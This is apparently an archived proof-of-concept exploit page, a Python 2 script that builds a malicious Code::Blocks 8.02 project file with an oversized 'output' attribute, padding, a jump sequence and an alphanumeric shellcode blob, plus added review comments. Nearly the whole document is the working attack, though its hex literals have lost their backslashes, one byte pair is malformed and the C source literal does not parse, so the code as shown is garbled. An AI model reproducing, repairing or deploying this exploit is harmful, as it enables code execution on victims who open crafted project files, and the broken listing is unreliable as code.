
CodeBlocks 8.02 Buffer Overflow

Posted on 02 February 2011

#!/usr/bin/python
# Proof-of-concept generator (Python 2: print statements, raw_input). It writes
# two files into the directory given as <path>: a Code::Blocks project file
# "<project_name>.cbp" carrying an oversized attribute value, and a "main.c".
# The page title names Code::Blocks 8.02 as the affected version; the listing
# gives no fixed version.
#
# NOTE(review): the backslashes of the escape sequences appear to have been
# lost when this listing was extracted ("x3c" where "\x3c" was presumably
# meant), and the c_file literal below no longer parses because its inner
# quotes are unescaped. The literals are kept exactly as they appear on the page.
#
# Triage note: read as hex bytes, header1 ends at `<Option output="` inside
# `<Target title="Debug">`, so everything appended between header1 and header2
# becomes the value of that `output` attribute. A .cbp whose Debug-target
# `output` attribute is thousands of characters long is the artifact to look
# for when screening project files from untrusted sources.
import sys,os,shutil

# Exactly two arguments are required; otherwise print the banner and exit 0.
if len(sys.argv) != 3:
    print "------------------------------------------------"
    print "CodeBlocks (cbp) Buffer Overflow Exploit "
    print "Usage : exploit.py <project_name> <path>"
    print "Example : exploit.py sploit_proj c:proj\ "
    print "By : sup3r "
    print "------------------------------------------------"
    sys.exit(0)

# Both values come straight from the command line and are used unvalidated:
# `name` is spliced into the XML text and into a file name, `path` is deleted
# and recreated further down.
name = sys.argv[1]
path = sys.argv[2]

# First part of the project XML: the XML declaration, <CodeBlocks_project_file>,
# <FileVersion major="1" minor="6" />, <Project>, the title/pch_mode/compiler
# options, <Build>, <Target title="Debug"> and the opening of
# `<Option output="` (attribute value left open on purpose).
header1=(
"x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30x22x20"
"x65x6ex63x6fx64x69x6ex67x3dx22x55x54x46x2dx38x22x20x73x74x61"
"x6ex64x61x6cx6fx6ex65x3dx22x79x65x73x22x20x3fx3ex0ax3cx43x6f"
"x64x65x42x6cx6fx63x6bx73x5fx70x72x6fx6ax65x63x74x5fx66x69x6c"
"x65x3ex0ax09x3cx46x69x6cx65x56x65x72x73x69x6fx6ex20x6dx61x6a"
"x6fx72x3dx22x31x22x20x6dx69x6ex6fx72x3dx22x36x22x20x2fx3ex0a"
"x09x3cx50x72x6fx6ax65x63x74x3ex0ax09x09x3cx4fx70x74x69x6fx6e"
"x20x74x69x74x6cx65x3dx22"+name+"x22x20x2fx3ex0ax09x09x3cx4f"
"x70x74x69x6fx6ex20x70x63x68x5fx6dx6fx64x65x3dx22x32x22x20x2f"
"x3ex0ax09x09x3cx4fx70x74x69x6fx6ex20x63x6fx6dx70x69x6cx65x72"
"x3dx22x67x63x63x22x20x2fx3ex0ax09x09x3cx42x75x69x6cx64x3ex0a"
"x09x09x09x3cx54x61x72x67x65x74x20x74x69x74x6cx65x3dx22x44x65"
"x62x75x67x22x3ex0ax09x09x09x09x3cx4fx70x74x69x6fx6ex20x6fx75"
"x74x70x75x74x3dx22")

# Remainder of the project XML: closes the open `output` attribute, then the
# rest of the Debug target, a Release target (output "bin\Release\<name>"),
# compiler/linker options, the main.c <Unit>, <Extensions>, and the closing tags.
header2=(
"x22x20x70x72x65x66x69x78x5fx61x75x74x6fx3dx22x31x22x20x65x78"
"x74x65x6ex73x69x6fx6ex5fx61x75x74x6fx3dx22x31x22x20x2fx3ex0a"
"x09x09x09x09x3cx4fx70x74x69x6fx6ex20x6fx62x6ax65x63x74x5fx6f"
"x75x74x70x75x74x3dx22x6fx62x6ax5cx44x65x62x75x67x5cx22x20x2f"
"x3ex0ax09x09x09x09x3cx4fx70x74x69x6fx6ex20x74x79x70x65x3dx22"
"x31x22x20x2fx3ex0ax09x09x09x09x3cx4fx70x74x69x6fx6ex20x63x6f"
"x6dx70x69x6cx65x72x3dx22x67x63x63x22x20x2fx3ex0ax09x09x09x09"
"x3cx43x6fx6dx70x69x6cx65x72x3ex0ax09x09x09x09x09x3cx41x64x64"
"x20x6fx70x74x69x6fx6ex3dx22x2dx67x22x20x2fx3ex0ax09x09x09x09"
"x3cx2fx43x6fx6dx70x69x6cx65x72x3ex0ax09x09x09x3cx2fx54x61x72"
"x67x65x74x3ex0ax09x09x09x3cx54x61x72x67x65x74x20x74x69x74x6c"
"x65x3dx22x52x65x6cx65x61x73x65x22x3ex0ax09x09x09x09x3cx4fx70"
"x74x69x6fx6ex20x6fx75x74x70x75x74x3dx22x62x69x6ex5cx52x65x6c"
"x65x61x73x65x5c"+name+"x22x20x70x72x65x66x69x78x5fx61x75x74"
"x6fx3dx22x31x22x20x65x78x74x65x6ex73x69x6fx6ex5fx61x75x74x6f"
"x3dx22x31x22x20x2fx3ex0ax09x09x09x09x3cx4fx70x74x69x6fx6ex20"
"x6fx62x6ax65x63x74x5fx6fx75x74x70x75x74x3dx22x6fx62x6ax5cx52"
"x65x6cx65x61x73x65x5cx22x20x2fx3ex0ax09x09x09x09x3cx4fx70x74"
"x69x6fx6ex20x74x79x70x65x3dx22x31x22x20x2fx3ex0ax09x09x09x09"
"x3cx4fx70x74x69x6fx6ex20x63x6fx6dx70x69x6cx65x72x3dx22x67x63"
"x63x22x20x2fx3ex0ax09x09x09x09x3cx43x6fx6dx70x69x6cx65x72x3e"
"x0ax09x09x09x09x09x3cx41x64x64x20x6fx70x74x69x6fx6ex3dx22x2d"
"x4fx32x22x20x2fx3ex0ax09x09x09x09x3cx2fx43x6fx6dx70x69x6cx65"
"x72x3ex0ax09x09x09x09x3cx4cx69x6ex6bx65x72x3ex0ax09x09x09x09"
"x09x3cx41x64x64x20x6fx70x74x69x6fx6ex3dx22x2dx73x22x20x2fx3e"
"x0ax09x09x09x09x3cx2fx4cx69x6ex6bx65x72x3ex0ax09x09x09x3cx2f"
"x54x61x72x67x65x74x3ex0ax09x09x3cx2fx42x75x69x6cx64x3ex0ax09"
"x09x3cx43x6fx6dx70x69x6cx65x72x3ex0ax09x09x09x3cx41x64x64x20"
"x6fx70x74x69x6fx6ex3dx22x2dx57x61x6cx6cx22x20x2fx3ex0ax09x09"
"x3cx2fx43x6fx6dx70x69x6cx65x72x3ex0ax09x09x3cx55x6ex69x74x20"
"x66x69x6cx65x6ex61x6dx65x3dx22x6dx61x69x6ex2ex63x22x3ex0ax09"
"x09x09x3cx4fx70x74x69x6fx6ex20x63x6fx6dx70x69x6cx65x72x56x61"
"x72x3dx22x43x43x22x20x2fx3ex0ax09x09x3cx2fx55x6ex69x74x3ex0a"
"x09x09x3cx45x78x74x65x6ex73x69x6fx6ex73x3ex0ax09x09x09x3cx63"
"x6fx64x65x5fx63x6fx6dx70x6cx65x74x69x6fx6ex20x2fx3ex0ax09x09"
"x09x3cx64x65x62x75x67x67x65x72x20x2fx3ex0ax09x09x3cx2fx45x78"
"x74x65x6ex73x69x6fx6ex73x3ex0ax09x3cx2fx50x72x6fx6ax65x63x74"
"x3ex0ax3cx2fx43x6fx64x65x42x6cx6fx63x6bx73x5fx70x72x6fx6ax65"
"x63x74x5fx66x69x6cx65x3ex0a")

# Placeholder C source written next to the project so that the <Unit> entry
# for main.c resolves to a file.
# NOTE(review): as extracted, the printf line contains unescaped double quotes,
# so this literal is not valid Python in its current form.
c_file=(
"#include <stdio.h> "
"#include <stdlib.h> "
"int main() "
"{ "
" printf("Don't compile "); "
" return 0; "
"} ")

# Author's own label for the blob below; the string consists only of letters
# and digits. What it does when executed is not verifiable from this listing.
#calc shellcode -> 375 bytes
shellcode=(
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIvSkymS8iKnKizNkipta"
"4XtckmQ2SuCZMwgQQrVK3zKKL8bJTVqioWuCFZMR79Z4sN1mLEmqcz5WfLnimlbTOkz7YhM"
"TVLjgORFvCiZQgVcUvmQxo71MCmQS2ZJxVlK1kjLZuoZOrZvPC2EBRnxL28JWY9YTVLjdPP"
"f5KvjimNRTKSpompftKYZ47UVMNeMrrxiZtppx6MYMLvaCvrHjwvYqj2FV7rmKMOm6khlKM"
"OuUOMzCOQvNwl1T6xmwgKzUNZqQXRPMPNmaQo8Nnpnn77Jq6k5pilYJ4mNQojymXqwvyUFO"
"ytJPtq0vzNn7gw1CFtJA")

# Assemble the file contents: header1, the attribute value, header2.
# The first filler run is sized as 4072-len(path), so the generated file differs
# with the directory it is written to; the last run pads the blob out to a fixed
# 6720. If each xNN was originally a single byte (presumed, see the note at the
# top), the attribute value comes to roughly 11,000 bytes.
# NOTE(review): "xp" is not a well-formed hex pair even with a backslash
# restored, so at least that fragment is damaged beyond what the page shows.
payload = header1
payload += "x41"*(4072-len(path))
payload += "x74x06x41x41"
payload += "xp"
payload += "x30x71"
payload += "x61"*169
payload += "x41"*111
payload += shellcode
payload += "x61"*(6720-len(shellcode))
payload += header2

# Recursively deletes whatever directory was passed as <path> before recreating
# it; a missing directory (os.error) is ignored. When reproducing this in a lab,
# <path> therefore has to be a disposable directory.
try:
    shutil.rmtree(path)
except os.error:
    pass

# Write the project file and main.c. File names are built by plain string
# concatenation, so <path> must already end in a path separator (as in the
# usage example). The main.c handle is never closed explicitly, and the bare
# except reduces every failure (mkdir, open, write) to the single word "Error!".
try:
    os.mkdir(path)
    cbp = open(path+name+'.cbp', 'w')
    cbp.write(payload)
    cbp.close()
    main = open(path+'main.c', 'w')
    main.write(c_file)
    raw_input("[x] Exploit project created!")
except:
    print "Error!"

 
